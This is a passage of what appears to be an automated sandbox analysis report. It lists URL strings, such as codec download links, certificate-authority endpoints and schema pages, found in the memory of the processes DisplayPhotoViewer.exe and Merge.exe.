                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://mediaarea.net/DX50;;;YUV;4:2:0
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://mediaarea.net/XVID;;;YUV;4:2:0
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://mediaxw.sourceforge.net
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://mediaxw.sourceforge.net;;;YUV
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://mirror01.iptelecom.net.ua/~video/codecs/Autodesk.Animator.v1.11.Codec.exe
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://mirror01.iptelecom.net.ua/~video/codecs/Autodesk.Animator.v1.11.Codec.exe;;;
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://mirror01.iptelecom.net.ua/~video/codecs/Autodesk.Animator.v1.11.Codec.exe;;;RGB
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://mirror01.iptelecom.net.ua/~video/codecs/Avid.VfW.codec.v2.0d2.exe
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://mirror01.iptelecom.net.ua/~video/codecs/Avid.VfW.codec.v2.0d2.exe;;;
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://mirror01.iptelecom.net.ua/~video/codecs/Avid.VfW.codec.v2.0d2.exe;;;;
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://mirror01.iptelecom.net.ua/~video/codecs/Avid.VfW.codec.v2.0d2.exe;;;YUV
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://mirror01.iptelecom.net.ua/~video/codecs/Avid.VfW.codec.v2.0d2.exe;;;YUV;
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://mirror01.iptelecom.net.ua/~video/codecs/CUseeMe.JPEG.CODEC.v1.17.exe
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://mirror01.iptelecom.net.ua/~video/codecs/CUseeMe.JPEG.CODEC.v1.17.exe;;;YUV
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://mirror01.iptelecom.net.ua/~video/codecs/LEAD.MCMP-JPEG.v1.016.codec.exe
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://mirror01.iptelecom.net.ua/~video/codecs/LEAD.MCMP-JPEG.v1.016.codec.exe;;;
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://mirror01.iptelecom.net.ua/~video/codecs/LEAD.MCMP-JPEG.v1.016.codec.exe;;;YUV
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://mirror01.iptelecom.net.ua/~video/codecs/PICVideo.Lossless.JPEG.codec.v2.10.27.exe
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://mirror01.iptelecom.net.ua/~video/codecs/PICVideo.Lossless.JPEG.codec.v2.10.27.exe;;;YUV
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://mirror01.iptelecom.net.ua/~video/codecs/PICVideo.MJPG.v2.10.27.codec.exe
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://mirror01.iptelecom.net.ua/~video/codecs/PICVideo.MJPG.v2.10.27.codec.exe;;;YUV
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://mirror01.iptelecom.net.ua/~video/codecs/Pinnacle.ReelTime.v2.5.software.only.codec.exe
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://mirror01.iptelecom.net.ua/~video/codecs/Pinnacle.ReelTime.v2.5.software.only.codec.exe;;;
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://mirror01.iptelecom.net.ua/~video/codecs/Pinnacle.ReelTime.v2.5.software.only.codec.exe;;;YUV
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://mirror01.iptelecom.net.ua/~video/codecs/miroVIDEO-XL.codec.v2.2.exe
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://mirror01.iptelecom.net.ua/~video/codecs/miroVIDEO-XL.codec.v2.2.exe;;;YUV
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://mysif.ru/SIF1_dd_Eng.htm;;;
                                Source: Merge.exe, 00000000.00000003.2541749470.0000000000B3F000.00000004.00000020.00020000.00000000.sdmp, Merge.exe, 00000000.00000003.2541707986.0000000003951000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                                Source: Merge.exe, 00000000.00000003.2541749470.0000000000B3F000.00000004.00000020.00020000.00000000.sdmp, Merge.exe, 00000000.00000003.2541707986.0000000003951000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                                Source: Merge.exe, 00000000.00000003.2541749470.0000000000B3F000.00000004.00000020.00020000.00000000.sdmp, Merge.exe, 00000000.00000003.2541707986.0000000003951000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                                Source: Merge.exe, 00000000.00000003.2541749470.0000000000B3F000.00000004.00000020.00020000.00000000.sdmp, Merge.exe, 00000000.00000003.2541707986.0000000003951000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
                                Source: Merge.exe, 00000000.00000003.2541749470.0000000000B3F000.00000004.00000020.00020000.00000000.sdmp, Merge.exe, 00000000.00000003.2541707986.0000000003951000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
                                Source: DisplayPhotoViewer.exe, 00000006.00000003.2941656091.000000000A712000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3122142214.000000000A5DF000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2942350637.000000000A7C7000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2943414129.000000000A63F000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2943326957.000000000A6C1000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2950813744.000000000A6CC000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2644059038.000000000A635000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2935754042.0000000007A36000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000ADDA000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2943743795.000000000A7D7000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2634861679.000000000A65E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2638496505.000000000B49F000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2945078225.000000000A777000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3116425727.0000000007AF9000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3122142214.000000000A5BE000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2951391104.000000000A743000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2934851183.000000000A66E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2614739291.000000000A4AA000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2943177680.000000000A773000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2940933364.000000000A777000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000B288000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.thawte.com0
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://opus-codec.org
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://opus-codec.org/;Lossy
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://pbcore.org/xsd/pbcore-2.0.xsd
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://pbcore.org/xsd/pbcore-2.0.xsdhttp://www.pbcore.org/PBCore/PBCoreNamespace.html
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3214284754.000000006B041000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: http://quoteunquoteapps.com)
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3214284754.000000006B041000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: http://quoteunquoteapps.comhttp://basicrecipe.comCopyright
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://rarlabs.com
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3214284754.000000006B041000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: http://scripts.sil.org/OFL
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3214284754.000000006B041000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: http://scripts.sil.org/OFLCopyright
                                Source: Merge.exe, 00000000.00000003.2541749470.0000000000B3F000.00000004.00000020.00020000.00000000.sdmp, Merge.exe, 00000000.00000003.2541707986.0000000003951000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
                                Source: Merge.exe, 00000000.00000003.2541749470.0000000000B3F000.00000004.00000020.00020000.00000000.sdmp, Merge.exe, 00000000.00000003.2541707986.0000000003951000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
                                Source: DisplayPhotoViewer.exe, 00000006.00000003.2941656091.000000000A712000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3122142214.000000000A5DF000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2942350637.000000000A7C7000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2943414129.000000000A63F000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2943326957.000000000A6C1000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2950813744.000000000A6CC000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2644059038.000000000A635000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2935754042.0000000007A36000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000ADDA000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2943743795.000000000A7D7000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2634861679.000000000A65E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2638496505.000000000B49F000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2945078225.000000000A777000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3116425727.0000000007AF9000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2951391104.000000000A743000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2934851183.000000000A66E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2614739291.000000000A4AA000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2943177680.000000000A773000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2940933364.000000000A777000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000B288000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2940493728.000000000A66E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sf.symcb.com/sf.crl0f
                                Source: DisplayPhotoViewer.exe, 00000006.00000003.2941656091.000000000A712000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3122142214.000000000A5DF000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2942350637.000000000A7C7000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2943414129.000000000A63F000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2644381259.000000000B9CB000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2943326957.000000000A6C1000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2950813744.000000000A6CC000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2644059038.000000000A635000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2935754042.0000000007A36000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000ADDA000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2943743795.000000000A7D7000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2634861679.000000000A65E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2638496505.000000000B49F000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2945078225.000000000A777000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3116425727.0000000007AF9000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2951391104.000000000A743000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2934851183.000000000A66E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2614739291.000000000A4AA000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2943177680.000000000A773000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2940933364.000000000A777000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000B288000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sf.symcb.com/sf.crt0
                                Source: DisplayPhotoViewer.exe, 00000006.00000003.2941656091.000000000A712000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3122142214.000000000A5DF000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2942350637.000000000A7C7000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2943414129.000000000A63F000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2644381259.000000000B9CB000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2943326957.000000000A6C1000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2950813744.000000000A6CC000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2644059038.000000000A635000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2935754042.0000000007A36000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000ADDA000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2943743795.000000000A7D7000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2634861679.000000000A65E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2638496505.000000000B49F000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2945078225.000000000A777000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3116425727.0000000007AF9000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2951391104.000000000A743000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2934851183.000000000A66E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2614739291.000000000A4AA000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2943177680.000000000A773000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2940933364.000000000A777000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000B288000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sf.symcd.com0&
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://sourceforge.net/project/showfiles.php?group_id=82303&package_id=84358
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://sourceforge.net/project/showfiles.php?group_id=82303&package_id=84358;;;
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://sourceforge.net/project/showfiles.php?group_id=82303&package_id=84358;;;YUV
                                Source: DisplayPhotoViewer.exe, 00000006.00000003.2601442890.0000000007A55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sourceforge.net/projects
                                Source: DisplayPhotoViewer.exe, 00000006.00000003.2935754042.0000000007954000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2601442890.0000000007A55000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3113621505.000000000798E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://sourceforge.net/projects/mediainfo/
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://standards.iso.org/ittf/PubliclyAvailableStandards/MPEG-7_schema_files/mpeg7-v2.xsd
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://standards.iso.org/ittf/PubliclyAvailableStandards/MPEG-7_schema_files/mpeg7-v2.xsdmpeg7:Descr
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://thbeck.de/Tak/Tak.html;Lossless
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://true-audio.com
                                Source: DisplayPhotoViewer.exe, 00000006.00000003.2941656091.000000000A712000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3122142214.000000000A5DF000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2942350637.000000000A7C7000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2943414129.000000000A63F000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2943326957.000000000A6C1000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2950813744.000000000A6CC000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2644059038.000000000A635000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2935754042.0000000007A36000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000ADDA000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2943743795.000000000A7D7000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2634861679.000000000A65E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2638496505.000000000B49F000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2945078225.000000000A777000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3116425727.0000000007AF9000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3122142214.000000000A5BE000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2951391104.000000000A743000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2934851183.000000000A66E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2614739291.000000000A4AA000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2943177680.000000000A773000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2940933364.000000000A777000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000B288000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                                Source: DisplayPhotoViewer.exe, 00000006.00000003.2941656091.000000000A712000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3122142214.000000000A5DF000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2942350637.000000000A7C7000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2943414129.000000000A63F000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2943326957.000000000A6C1000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2950813744.000000000A6CC000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2644059038.000000000A635000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2935754042.0000000007A36000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000ADDA000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2943743795.000000000A7D7000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2634861679.000000000A65E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2638496505.000000000B49F000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2945078225.000000000A777000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3116425727.0000000007AF9000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3122142214.000000000A5BE000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2951391104.000000000A743000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2934851183.000000000A66E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2614739291.000000000A4AA000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2943177680.000000000A773000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2940933364.000000000A777000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000B288000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                                Source: DisplayPhotoViewer.exe, 00000006.00000003.2941656091.000000000A712000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3122142214.000000000A5DF000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2942350637.000000000A7C7000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2943414129.000000000A63F000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2943326957.000000000A6C1000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2950813744.000000000A6CC000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2644059038.000000000A635000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2935754042.0000000007A36000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000ADDA000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2943743795.000000000A7D7000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2634861679.000000000A65E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2638496505.000000000B49F000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2945078225.000000000A777000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3116425727.0000000007AF9000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3122142214.000000000A5BE000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2951391104.000000000A743000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2934851183.000000000A66E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2614739291.000000000A4AA000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2943177680.000000000A773000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2940933364.000000000A777000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000B288000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com07
